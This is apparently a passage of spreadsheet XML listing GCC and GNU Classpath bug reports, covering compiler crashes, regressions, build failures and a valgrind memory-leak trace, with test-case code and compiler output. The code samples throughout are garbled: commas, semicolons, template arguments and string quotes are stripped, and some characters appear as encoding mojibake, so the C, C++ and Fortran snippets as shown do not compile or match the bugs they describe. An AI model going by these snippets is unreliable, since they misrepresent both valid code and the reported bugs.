    <t>There are 2 memory leaks related to usage of MPFR:
==70132==    at 0x4C29110: malloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==70132==    by 0x52B7F08: __gmp_default_allocate (in /usr/lib64/libgmp.so.10.1.3)
==70132==    by 0x507C0B0: mpfr_init2 (in /usr/lib64/libmpfr.so.4.1.2)
==70132==    by 0x104425A: (anonymous namespace)::format_floating_max(tree_node* char long) (gimple-ssa-sprintf.c:1500)
==70132==    by 0x1044858: format_floating (gimple-ssa-sprintf.c:1628)
==70132==    by 0x1044858: (anonymous namespace)::format_floating((anonymous namespace)::directive const&amp; tree_node*) (gimple-ssa-sprintf.c:1674)
==70132==    by 0x10457DD: format_directive (gimple-ssa-sprintf.c:2444)
==70132==    by 0x10457DD: compute_format_length (gimple-ssa-sprintf.c:3104)
==70132==    by 0x10457DD: handle_gimple_call (gimple-ssa-sprintf.c:3524)
==70132==    by 0x10457DD: (anonymous namespace)::pass_sprintf_length::execute(function*) (gimple-ssa-sprintf.c:3552)
==70132==    by 0x99BABE: execute_one_pass(opt_pass*) (passes.c:2465)
==70132==    by 0x99C277: execute_pass_list_1(opt_pass*) (passes.c:2554)
==70132==    by 0x99C289: execute_pass_list_1(opt_pass*) (passes.c:2555)
==70132==    by 0x99C2D4: execute_pass_list(function* opt_pass*) (passes.c:2565)
==70132==    by 0x71EB85: cgraph_node::expand() (cgraphunit.c:2036)
==70132==    by 0x7200E3: expand_all_functions (cgraphunit.c:2172)
==70132==    by 0x7200E3: symbol_table::compile() (cgraphunit.c:2529)
==70132==    by 0x7218FB: symbol_table::finalize_compilation_unit() (cgraphunit.c:2619)
==70132==    by 0xA5A8AB: compile_file() (toplev.c:488)
==70132==    by 0x5F3C08: do_compile (toplev.c:1983)
==70132==    by 0x5F3C08: toplev::main(int char**) (toplev.c:2117)
==70132==    by 0x5F59B6: main (main.c:39)
==70132== 24 bytes in 1 blocks are possibly lost in loss record 14 of 1350
==70132==    at 0x4C2B41E: realloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==70132==    by 0x52B7F53: __gmp_default_reallocate (in /usr/lib64/libgmp.so.10.1.3)
==70132==    by 0x506CC2E: mpfr_set_prec (in /usr/lib64/libmpfr.so.4.1.2)
==70132==    by 0x5087128: mpfr_cache (in /usr/lib64/libmpfr.so.4.1.2)
==70132==    by 0x5062359: mpfr_log (in /usr/lib64/libmpfr.so.4.1.2)
==70132==    by 0x507A25B: mpfr_log2 (in /usr/lib64/libmpfr.so.4.1.2)
==70132==    by 0x50691D1: mpfr_pow (in /usr/lib64/libmpfr.so.4.1.2)
==70132==    by 0x507A8C3: mpfr_ui_pow (in /usr/lib64/libmpfr.so.4.1.2)
==70132==    by 0x50654C7: ??? (in /usr/lib64/libmpfr.so.4.1.2)
==70132==    by 0x506556E: ??? (in /usr/lib64/libmpfr.so.4.1.2)
==70132==    by 0x5066A9E: __gmpfr_vasprintf (in /usr/lib64/libmpfr.so.4.1.2)
==70132==    by 0x5064E53: mpfr_snprintf (in /usr/lib64/libmpfr.so.4.1.2)
==70132==    by 0x1044142: (anonymous namespace)::get_mpfr_format_length(__mpfr_struct* char const* long char char) (gimple-ssa-sprintf.c:1463)
==70132==    by 0x1044795: (anonymous namespace)::format_floating((anonymous namespace)::directive const&amp; tree_node*) (gimple-ssa-sprintf.c:1741)
==70132==    by 0x10457DD: format_directive (gimple-ssa-sprintf.c:2444)
==70132==    by 0x10457DD: compute_format_length (gimple-ssa-sprintf.c:3104)
==70132==    by 0x10457DD: handle_gimple_call (gimple-ssa-sprintf.c:3524)
==70132==    by 0x10457DD: (anonymous namespace)::pass_sprintf_length::execute(function*) (gimple-ssa-sprintf.c:3552)
==70132==    by 0x99BABE: execute_one_pass(opt_pass*) (passes.c:2465)
==70132==    by 0x99C277: execute_pass_list_1(opt_pass*) (passes.c:2554)
==70132==    by 0x99C289: execute_pass_list_1(opt_pass*) (passes.c:2555)
==70132==    by 0x99C2D4: execute_pass_list(function* opt_pass*) (passes.c:2565)
==70132==    by 0x71EB85: cgraph_node::expand() (cgraphunit.c:2036)
==70132==    by 0x7200E3: expand_all_functions (cgraphunit.c:2172)
==70132==    by 0x7200E3: symbol_table::compile() (cgraphunit.c:2529)
==70132==    by 0x7218FB: symbol_table::finalize_compilation_unit() (cgraphunit.c:2619)
==70132==    by 0xA5A8AB: compile_file() (toplev.c:488)
==70132==    by 0x5F3C08: do_compile (toplev.c:1983)
==70132==    by 0x5F3C08: toplev::main(int char**) (toplev.c:2117)
==70132==    by 0x5F59B6: main (main.c:39)</t>
  </si>
  <si>
    <t>GCC-15196</t>
  </si>
  <si>
    <t>ICE: gfc_trans_scalar_assign: Assertion `lse-&gt;string_length != NULL_TREE'</t>
  </si>
  <si>
    <t>This code does not compile. absoft and icc are fine.
module foo
  implicit none
  type:: dctype
     character LCR
  end type dctype
  type:: permtype
     character LCR(100)
  end type permtype
  type(dctype)::   dchitpos(100)
  type(permtype):: perm(100)
contains
  subroutine bar
    integer:: n ii
    !! following line produces:
    !! f951: ../../gcc/gcc/fortran/trans-expr.c:1595: gfc_trans_scalar_assign:
Assertion `lse-&gt;string_length != (tree) ((void *)0) &amp;&amp; rse-&gt;string_length !=
(tree) ((void *)0)' failed.
    dchitpos(1:n)%LCR = perm(ii)%LCR(1:n)
  end subroutine bar
end module foo
[olchansk@dork gfortran_test]$ make test_gfc_trans_scalar_assign.o
/triumfcs/trshare/olchansk/gcc-tree-ssa/install/bin/gfortran -x f95 -c  -o
test_gfc_trans_scalar_assign.o -O2 -g -Wall -Waliasing -Wline-truncation
-Wsurprising -Wunused-labels -fPIC -ffixed-line-length-132
test_gfc_trans_scalar_assign.f90
Warning: Line 19 of test_gfc_trans_scalar_assign.f90 is being truncated
f951: ../../gcc/gcc/fortran/trans-expr.c:1595: gfc_trans_scalar_assign:
Assertion `lse-&gt;string_length != (tree) ((void *)0) &amp;&amp; rse-&gt;string_length !=
(tree) ((void *)0)' failed.
test_gfc_trans_scalar_assign.f90: In function `bar':
test_gfc_trans_scalar_assign.f90:20: internal compiler error: Aborted
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [test_gfc_trans_scalar_assign.o] Error 1
K.O.</t>
  </si>
  <si>
    <t>GCC-71728</t>
  </si>
  <si>
    <t>[5 Regression] ICE with goto in statement-expression inside a condition</t>
  </si>
  <si>
    <t>Compiling this source:
int main()
{
    if (({ goto test test: 1 }))
}
with g++ -Wall test.cpp -o test gives:
test.cpp: In function 'int main()':
test.cpp:3:34: internal compiler error: in potential_constant_expression_1 at cp/constexpr.c:5151
     if (({ goto test test: 1 }))
                                  ^
Note that without -Wall there is no ICE.
gcc -v:
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-pc-linux-gnu/6.1.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /build/gcc-multilib/src/gcc/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --enable-libmpx --with-system-zlib --with-isl --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --disable-libssp --enable-gnu-unique-object --enable-linker-build-id --enable-lto --enable-plugin --enable-install-libiberty --with-linker-hash-style=gnu --enable-gnu-indirect-function --enable-multilib --disable-werror --enable-checking=release
Thread model: posix
gcc version 6.1.1 20160602 (GCC)</t>
  </si>
  <si>
    <t>andrey.vihrov</t>
  </si>
  <si>
    <t>GCC-43066</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE: SIGFPE with empty struct and va_arg</t>
  </si>
  <si>
    <t>Command line:
gcc -O1 -c testcase.c
Tested revisions:
trunk r156745 - crash
trunk r156293 - crash
trunk r155966 - OK
trunk r155609 - OK
trunk r155363 - OK
4.4 r156256 - OK
Output:
$ /mnt/svn/gcc-trunk/binary-156745-lto/bin/gcc -O1 -c testcase.c
testcase.c: In function 'foo':
testcase.c:14:1: internal compiler error: Floating point exception
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>CLASSPATH-23701</t>
  </si>
  <si>
    <t>GtkClipboard.c requires GTK 2.6</t>
  </si>
  <si>
    <t>gnu_java_awt_peer_gtk_GtkClipboard.c uses a number of functions introduced in
GTK 2.6 causing it to fail to cleanly build / work with GTK 2.4.
Specifically (taken from log of build aginst GTK 2.4 with -Werror):
gdk_display_supports_selection_notification
gdk_display_request_selection_notification
gtk_selection_data_set_pixbuf
gtk_selection_data_set_uris
gtk_target_list_add_text_targets
gtk_target_list_add_image_targets
gtk_target_list_add_uri_targets
gtk_clipboard_set_can_store</t>
  </si>
  <si>
    <t>GCC-71742</t>
  </si>
  <si>
    <t>Wrong formulation of error: flexible array member in otherwise empty struct</t>
  </si>
  <si>
    <t>Source code:
----------------------------------------------------------------------
int main()
{
  struct s {
    int :1
    int a[]
  }
}
----------------------------------------------------------------------
Results:
----------------------------------------------------------------------
$ gcc -std=c11 -pedantic -Wall -Wextra -O3 test.c &amp;&amp; ./a.out
test.c: In function â€˜mainâ€™:
test.c:5:9: error: flexible array member in otherwise empty struct
     int a[]
         ^
----------------------------------------------------------------------
gcc version: gcc (GCC) 7.0.0 20160627 (experimental)
gcc is right in detecting an error in this testcase but the message is wrong because the struct is not otherwise empty. The problem is absence of named members.
The relevant rule:
C11 6.7.2.1p18: As a special case the last element of a structure with more than one named member may have an incomplete array type this is called a flexible array member.</t>
  </si>
  <si>
    <t>ch3root</t>
  </si>
  <si>
    <t>GCC-25672</t>
  </si>
  <si>
    <t>[4.9 Regression] cross build's libgcc picks up CFLAGS</t>
  </si>
  <si>
    <t>I'm configuring gcc with:
./configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man
--bindir=/usr/bin --libdir=/usr/lib --libexecdir=/usr/lib --disable-shared
--disable-threads --enable-languages=cc++ --enable-c99 --enable-long-long
--disable-nls --with-gnu-as --with-gnu-ld --with-demangler-in-ld
--with-system-zlib --enable-multilib
--with-headers=/home/users/builder/rpm/BUILD/gcc-4.1-20051230/fake-root/usr/include
--without-x
--target=ppc64-pld-linux
--host=i686-pld-linux
--build=i686-pld-linux
CFLAGS=-O2 -march=i686 -mtune=pentium4 -ggdb
CXXFLAGS=-O2 -march=i686 -mtune=pentium4 -ggdb
TEXCONFIG=false
it worked fine with gcc-4.0.2.
in 4.1 ./xgcc gets wrong cflags (from host).
(...)
/home/users/builder/rpm/BUILD/gcc-4.1-20051230/obj-ppc64-pld-linux/./gcc/xgcc
-B/home/users/builder/rpm/BUILD/gcc-4.1-20051230/obj-ppc64-pld-linux/./gcc/
-B/usr/ppc64-pld-linux/bin/ -B/usr/ppc64-pld-linux/lib/
-isystem /usr/ppc64-pld-linux/include
-isystem /usr/ppc64-pld-linux/sys-include -O2 -O2 -O2 -march=i686
-mtune=pentium4 -ggdb  -DIN_GCC -DCROSS_COMPILE   -W -Wall -Wwrite-strings
-Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition
-isystem ./include  -I. -I. -I../../gcc -I../../gcc/. -I../../gcc/../include
-I../../gcc/../libcpp/include   -g0 -finhibit-size-directive
-fno-inline-functions -fno-exceptions -fno-zero-initialized-in-bss
-fno-unit-at-a-time  -msdata=none \
-c ../../gcc/crtstuff.c -DCRT_BEGIN \
-o crtbegin.o
cc1: error: unrecognized command line option -march=i686
../../gcc/crtstuff.c:1: error: bad value (pentium4) for -mtune= switch
make[1]: *** [crtbegin.o] Error 1
make[1]: Leaving directory `/home/users/builder/rpm/BUILD/gcc-4.1-20051230/obj-ppc64-pld-linux/gcc'</t>
  </si>
  <si>
    <t>GCC-13139</t>
  </si>
  <si>
    <t>gcj throws exception with faulty stacktrace with freenet</t>
  </si>
  <si>
    <t>Download freenet 0.5.2.1 from
http://freenetproject.org/snapshots/freenet-0.5.2.1.tar.gz .
$ tar xfz freenet-0.5.2.1.tar.gz
$ cd freenet
change all occurences of java in start-freenet.sh to gij
$ sh start-freenet.sh
wait for a few seconds and you should see this exception on the console:
&gt;Exception in thread main 
&gt; java.nio.channels.IllegalBlockingModeException
&gt;    at gnu.gcj.runtime.FirstThread.call_main() 
&gt; (/tmp/topic/gcc-cvs/lib/libgcj.so.4.0.0)
&gt;    at gnu.gcj.runtime.FirstThread.run() 
&gt; (/tmp/topic/gcc-cvs/lib/libgcj.so.4.0.0)
&gt;    at _Jv_ThreadRun(java.lang.Thread) 
&gt; (/tmp/topic/gcc-cvs/lib/libgcj.so.4.0.0)
&gt;    at _Jv_RunMain(java.lang.Class byte const int byte const 
&gt; boolean) (/tmp/topic/gcc-cvs/lib/libgcj.so.4.0.0)
&gt;    at main (/tmp/topic/gcc/libjava/gij.cc:167)
&gt;    at __libc_start_main (/lib/libc-2.2.5.so)
&gt;    at _start (Unknown Source)
The stack trace is clearly bogus as this excpetion is only thrown in java code
in java.net package so there should be at least java.net.Socket
java.net.ServerSocket or java.net.DatagramSocket mentioned in the stack trace.</t>
  </si>
  <si>
    <t>robilad</t>
  </si>
  <si>
    <t>GCC-80227</t>
  </si>
  <si>
    <t>[6/7 Regression] SFINAE ambiguity with a pointer to array argument</t>
  </si>
  <si>
    <t>Prior to version 4.6 GCC accepted the well-formed program below.  Since r166453 GCC rejects it because it fails to eliminate the second overload of the foo template from the overload list.  The second overload isn't viable because substituting int for T results in the second argument to the function having an invalid type (pointer to an array of excessive size).
$ cat y.C &amp;&amp; gcc -S -Wall -Wextra -Wpedantic y.C
template 
int foo (T)
template 
int foo (T U* = 0)
int i = foo (123)
y.C:7:17: error: call of overloaded â€˜foo(int)â€™ is ambiguous
 int i = foo (123)
                 ^
y.C:2:5: note: candidate: int foo(T) [with T = int]
 int foo (T)
     ^~~
y.C:5:5: note: candidate: int foo(T U*) [with T = int U = int [-1]]
 int foo (T U* = 0)
     ^~~
Conversely while prior to r166453 GCC would reject the following invalid program
template 
int foo (T int (*)[sizeof (T) - 5] = 0)
int i = foo (123)
with
t.C:4:17: error: no matching function for call to â€˜foo(int)â€™
t.C:2:40: note: candidate is: template int foo(T int (*)[(sizeof (T) - 5)])
GCC 4.6 and later accept it.</t>
  </si>
  <si>
    <t>GCC-41608</t>
  </si>
  <si>
    <t>[OOP] ICE with CLASS and invalid code</t>
  </si>
  <si>
    <t>class(t1) pointer :: c  ! missing TYPE decl
  select type (c)
  type is (t1)
  end select
end
f951: internal compiler error: in find_typebound_proc_uop at fortran/symbol.c:4657</t>
  </si>
  <si>
    <t>GCC-78242</t>
  </si>
  <si>
    <t>Error in testsuite/gcc.dg/asan/use-after-scope-8.c since its introduction</t>
  </si>
  <si>
    <t>There is a problem in the new test case gcc.dg/asan/use-after-scope-8.c
/home/seurer/gcc/build/gcc-trunk/gcc/xgcc -B/home/seurer/gcc/build/gcc-trunk/gcc/ /home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/asan/use-after-scope-8.c -B/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libsanitizer/ -B/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libsanitizer/asan/ -L/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libsanitizer/asan/.libs -fsanitize=address -g -I/home/seurer/gcc/gcc-trunk/gcc/testsuite/../../libsanitizer/include -fno-diagnostics-show-caret -fdiagnostics-color=never -O0 -fdump-tree-asan0 -S -o use-after-scope-8.s
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/asan/use-after-scope-8.c: In function 'fn1':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/asan/use-after-scope-8.c:9:16: error: invalid register name for 'a'
compiler exited with status 1
output is:
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/asan/use-after-scope-8.c: In function 'fn1':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/asan/use-after-scope-8.c:9:16: error: invalid register name for 'a'
FAIL: gcc.dg/asan/use-after-scope-8.c   -O0  (test for excess errors)
Excess errors:
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/asan/use-after-scope-8.c:9:16: error: invalid register name for 'a'</t>
  </si>
  <si>
    <t>GCC-2711</t>
  </si>
  <si>
    <t>ice in c_expand_expr (namespace directive)</t>
  </si>
  <si>
    <t>Compiling the source code t.C generates an internal compiler error. If
the using namespace std directive is moved in front of the function f()
the crash does not occur. gcc 2.95 compiles the code without a problem.
Release:
3.0 20010501 (prerelease)
Environment:
System: Linux kiste 2.4.3 #35 Sat Mar 31 22:08:25 CEST 2001 i686 unknown
Architecture: i686
SuSE 7.1
Glibc 2.2
GNU assembler 2.11.90.0.4
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long --enable-languages=cc++f77objc
How-To-Repeat:
Source code t.C
namespace std
{
    template
    class complex
    {
    public:
        complex(const _Tp
        _Tp real() const
        _Tp imag() const
    private:
        _Tp _M_real _M_imag
    }
    template
    inline 
    complex::complex(const _Tp&amp; __r const _Tp&amp; __i)
            : _M_real(__r) _M_imag(__i) { }
    template
    inline _Tp
    complex::real() const { return _M_real }
    template
    inline _Tp
    complex::imag() const { return _M_imag }
    template
    inline complex
    conj(const complex&amp; __z)
    { return complex(__z.real() -__z.imag()) }
    template class complex
    {
    public:
        complex(double = 0.0 double = 0.0)
        double real() const
        double imag() const
    private:
        typedef __complex__ double _ComplexT
        _ComplexT _M_value
    }
    inline
    complex::complex(double r double i)
    {
        __real__ _M_value = r
        __imag__ _M_value = i
    }
    inline double
    complex::real() const
    { return __real__ _M_value }
    inline double
    complex::imag() const
    { return __imag__ _M_value }
}
void f()
{
    using namespace std   
    complex c(1.0 2.0)
    complex e = conj(c)
}
int main()
{
    f()
}
Compiling t.C
g++ -v -o t t.C -W -Wall 
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long --enable-languages=cc++f77objc
Thread model: posix
gcc version 3.0 20010501 (prerelease)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -W -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ t.C -D__GNUG__=3 -D_GNU_SOURCE -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -quiet -dumpbase t.C -W -Wall -version -o /tmp/ccGO400h.s
GNU CPP version 3.0 20010501 (prerelease) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0 20010501 (prerelease) (i686-pc-linux-gnu)
	compiled by GNU C version 3.0 20010501 (prerelease).
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
t.C: In function `void f()':
t.C:65: warning: unused variable `std::complex e'
t.C:65: Internal compiler error in c_expand_expr at c-common.c:4116
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-72709</t>
  </si>
  <si>
    <t>Incorrect assignment of allocatable character array used as component of derived type</t>
  </si>
  <si>
    <t>In the following program the assignment to character array element doesn't work
program    read_exp_data
   implicit none
   type experimental_data_t
      integer :: nh = 0
      character(len=:) dimension(:) allocatable :: header
   end type experimental_data_t
   type(experimental_data_t) :: ex
   integer :: nh_len
   integer :: i
   nh_len = 255
   ex % nh = 3
   allocate(character(len=nh_len) :: ex % header(ex % nh))
   ex % header(1) = #Generated by X
   ex % header(2) = #from file 'Y'
   ex % header(3) = # Experimental 4 mg/g
   do i = 1 ex % nh
      write(**) header(i) =  ex % header(i)     
   enddo
end program read_exp_data
I get all 3 header elements = # Experimental 4 mg/g
gfortran --version
GNU Fortran (SUSE Linux) 6.1.1 20160707 [gcc-6-branch revision 238088]
---
bug disappears if one replaces appropriate strings with
character(len=255) dimension(:) allocatable :: header
and
allocate(ex % header(ex % nh))</t>
  </si>
  <si>
    <t>zmi007</t>
  </si>
  <si>
    <t>GCC-38426</t>
  </si>
  <si>
    <t>[4.4 Regression] Incorrect code produced with -momit-leaf-frame-pointer -fno-unit-at-a-time</t>
  </si>
  <si>
    <t>GCC-4.4
_PsConvertToGuiThread@0:
        pushl   %ebp
        pushl   %edi
        pushl   %esi
        pushl   %ebx
        subl    $28 %esp
        movl    -2100956 %ebx
        movl    56(%ebx) %ebp
%ebp is used as a spare register in a non-leaf function.</t>
  </si>
  <si>
    <t>GCC-36736</t>
  </si>
  <si>
    <t>[4.3 Regression] gfortran unrecognizable insn on sh4</t>
  </si>
  <si>
    <t>gcc-4.3.0's gfortran fail to compile cernlib-2006 with this message.
gcc-4.1.3's one can compile without failure.
gfortran -g -c -O2 -g -mieee -fno-range-check -fno-automatic -fno-second-underscore    -I/builddir/build/BUILD/cernlib-2006/2006/build/geant321 -I/builddir/build/BUILD/cernlib-2006/2006/src/geant321 -I/builddir/build/BUILD/cernlib-2006/2006/src/geant321/ggeom -I/builddir/build/BUILD/cernlib-2006/2006/src/include  -DCERNLIB_LINUX -DCERNLIB_UNIX -DCERNLIB_LNX                                 -DCERNLIB_QMGLIBC                                   -DCERNLIB_GFORTRAN -DCERNLIB_BLDLIB  -o archive/gnext.o /builddir/build/BUILD/cernlib-2006/2006/src/geant321/ggeom/gnext.F
/builddir/build/BUILD/cernlib-2006/2006/src/geant321/ggeom/gnext.F: In function 'gnext':
/builddir/build/BUILD/cernlib-2006/2006/src/geant321/ggeom/gnext.F:876: error: unrecognizable insn:
(insn 10204 7670 6894 605 /builddir/build/BUILD/cernlib-2006/2006/src/geant321/ggeom/gnext.F:774 (parallel [
            (set (reg:SF 150 fpul)
                (const_double:SF 1.0e+10 [0x0.9502f9p+34]))
            (clobber (reg:SI 0 r0))
        ]) -1 (nil))
/builddir/build/BUILD/cernlib-2006/2006/src/geant321/ggeom/gnext.F:876: internal compiler error: in extract_insn at recog.c:1990
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
* It doesn't generate preprosessed file with -save-temps option. 
* Acording to PR target/36684 I can compile with -fno-schedule-insns option.
But I think this doesn't match -fPIC -O2 case and there will be another cause.
# /usr/bin/gfortran -v
Using built-in specs.
Target: sh4-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-languages=cc++objcobj-c++javafortran --enable-java-awt=gtk --disable-dssi --enable-plugin --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --build=sh4-redhat-linux
Thread model: posix
gcc version 4.3.0 20080404 (Red Hat 4.3.0-6.fs1.1) (GCC)</t>
  </si>
  <si>
    <t>GCC-63804</t>
  </si>
  <si>
    <t>[5 Regression] ice in find_oldest_value_reg with -g -O2</t>
  </si>
  <si>
    <t>Created attachment 33930
gzipped C source code
I just tried to compile the attached code
on gcc trunk dated 20141109 on an AMD x86_64 box.
The compiler said
$ ../results/bin/gcc -c -g -O2 bug169.c
brw_eu_emit.c: In function â€˜brw_oword_block_write_scratchâ€™:
brw_eu_emit.c:2071:1: internal compiler error: Segmentation fault
0xa82d3c crash_signal(int)
    ../../src/trunk/gcc/toplev.c:358
0x9c07fe find_oldest_value_reg(reg_class rtx_def* value_data*)
    ../../src/trunk/gcc/regcprop.c:459
0x9c0ab1 replace_oldest_value_reg(rtx_def** reg_class rtx_insn* value_data*)
    ../../src/trunk/gcc/regcprop.c:492
0x9bfbcc replace_oldest_value_addr(rtx_def** reg_class machine_mode unsigned char rtx_insn* value_data*)
    ../../src/trunk/gcc/regcprop.c:652
0x9be2a8 copyprop_hardreg_forward_1(basic_block_def* value_data*)
    ../../src/trunk/gcc/regcprop.c:761
0x9be19a copyprop_hardreg_forward_bb_without_debug_insn(basic_block_def*)
    ../../src/trunk/gcc/regcprop.c:1145
0xa47dbb prepare_shrink_wrap(basic_block_def*)
    ../../src/trunk/gcc/shrink-wrap.c:439
0xa48f60 try_shrink_wrapping(edge_def** edge_def* bitmap_head* rtx_insn*)
    ../../src/trunk/gcc/shrink-wrap.c:573
0x7f6709 thread_prologue_and_epilogue_insns()
    ../../src/trunk/gcc/function.c:5937
0x7f6709 rest_of_handle_thread_prologue_and_epilogue()
    ../../src/trunk/gcc/function.c:6476
0x7f6709 (anonymous namespace)::pass_thread_prologue_and_epilogue::execute(function*)
    ../../src/trunk/gcc/function.c:6514
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Flags -g -O2 required.</t>
  </si>
  <si>
    <t>GCC-3931</t>
  </si>
  <si>
    <t>avr-elf can't build libstdc++</t>
  </si>
  <si>
    <t>Build fails as follows:
/usr3/ftp_archive/gnu/gcc/ss/b3/b-avr-elf/gcc/xgcc -B/usr3/ftp_archive/gnu/gcc/s
s/b3/b-avr-elf/gcc/ -nostdinc++ -L/usr3/ftp_archive/gnu/gcc/ss/b3/b-avr-elf/avr-
elf/libstdc++-v3/src -L/usr3/ftp_archive/gnu/gcc/ss/b3/b-avr-elf/avr-elf/libstdc
++-v3/src/.libs -nostdinc -B/usr3/ftp_archive/gnu/gcc/ss/b3/b-avr-elf/avr-elf/ne
wlib/ -isystem /usr3/ftp_archive/gnu/gcc/ss/b3/b-avr-elf/avr-elf/newlib/targ-inc
lude -isystem /usr3/ftp_archive/gnu/gcc/ss/b3/gcc-30-cvs/newlib/libc/include -B/
opt/gnucross/avr-elf/bin/ -B/opt/gnucross/avr-elf/lib/ -isystem /opt/gnucross/av
r-elf/include -nostdinc++ -I/usr3/ftp_archive/gnu/gcc/ss/b3/b-avr-elf/avr-elf/li
bstdc++-v3/include/avr-elf -I/usr3/ftp_archive/gnu/gcc/ss/b3/b-avr-elf/avr-elf/l
ibstdc++-v3/include -I../../../../gcc-30-cvs/libstdc++-v3/libsupc++ -I../../../.
./gcc-30-cvs/libstdc++-v3/libmath -g -O2 -fno-implicit-templates -Wall -Wno-form
at -W -Wwrite-strings -Winline -fdiagnostics-show-location=once -g -c ../../../.
./gcc-30-cvs/libstdc++-v3/src/misc-inst.cc -o misc-inst.o
/tmp/ccLdMHkd.s: Assembler messages:
/tmp/ccLdMHkd.s:5296: Error: Value of 71520 too large for field of 2 bytes at 48
76
/tmp/ccLdMHkd.s:5442: Error: Value of 70906 too large for field of 2 bytes at 50
56
LOTS MOTE
Release:
gcc-30-cvs 20010802
Environment:
GNU/Linux RedHat 6.2 targetting avr-elf
How-To-Repeat:
configure for avr-elf and build.  I can provide support with binutils and simulator to someone investigating this.
 ../gcc-30-cvs/configure --target=avr-elf --prefix=/opt/gnucross --with-gnu-as -with-gnu-ld --with-newlib --verbose
make</t>
  </si>
  <si>
    <t>GCC-152</t>
  </si>
  <si>
    <t>g++ 2.95.2 rejects linkage specification in typedefs</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Tue 28 Mar 2000 16:28:49 -0700
 Hi
 the program below gives an error with g++ 2.95.2. I suppose this is just an
 unimplemented feature (see 7.5 p4) so if that's so I suggest that it be
 implemented without regard to the the current restriction that A
 linkage-specification shall occur only in namespace scope... This is currently
 a CWG issue and it is likely to be modified so that linkage-specifications can
 occur in typedefs at function class function signature and class template
 scope. Please see CWG issue 13 and the recent discussion Re: linkage
 specification on the CWG mailing list (c++std-core@research.att.com).
 Regards
 Martin
 $ cat test.cpp
 extern C typedef void foo ()
 $ g++ -c --pedantic test.cpp
 test.cpp:3: multiple storage classes in declaration of `foo'
Update: 2001-02-18 by jdennett@gcc.gnu.org
I've tested the above code with my gcc 
version 3.0 20010218 (prerelease) and the
error reported is still the same.  Comeau's
online compiler 4.2.44 compiles this happily
in strict mode.  I'll check in 14882.
Release:
2.95.2 (still fails in 3.0 20010504 (prerelease))
How-To-Repeat:
 $ cat test.cpp
 extern C typedef void foo ()
 $ g++ -c test.cpp
 test.cpp:3: multiple storage classes in declaration of `foo'</t>
  </si>
  <si>
    <t>GCC-39233</t>
  </si>
  <si>
    <t>[4.4 Regression] ivopts + vrp miscompilation</t>
  </si>
  <si>
    <t>extern void abort (void)
__attribute__((noinline)) void
foo (void *p)
{
  long l = (long) p
  if (l  6)
    abort ()
}
int
main ()
{
  int i
  for (i = 6 i &gt;= 0 i--)
    foo ((void *) (long) i)
  return 0
}
is miscompiled (into endless loop).  First ivopts decides to use a pointer IV going from (void *) 6 down with (void *) ivtmp.51 != (void *) -1 as loop condition then VRP comes in and as pointers can never wrap around optimizes the loop condition into 1.</t>
  </si>
  <si>
    <t>GCC-70684</t>
  </si>
  <si>
    <t>[4.9/5/6/7 Regression] incorrect reading of values from file on Windows</t>
  </si>
  <si>
    <t>When writing and then reading back values from a file on Windows (program built with gfortran via mxe cross compiler) the wrong values are read. Here is a trivial example:
program test
implicit none
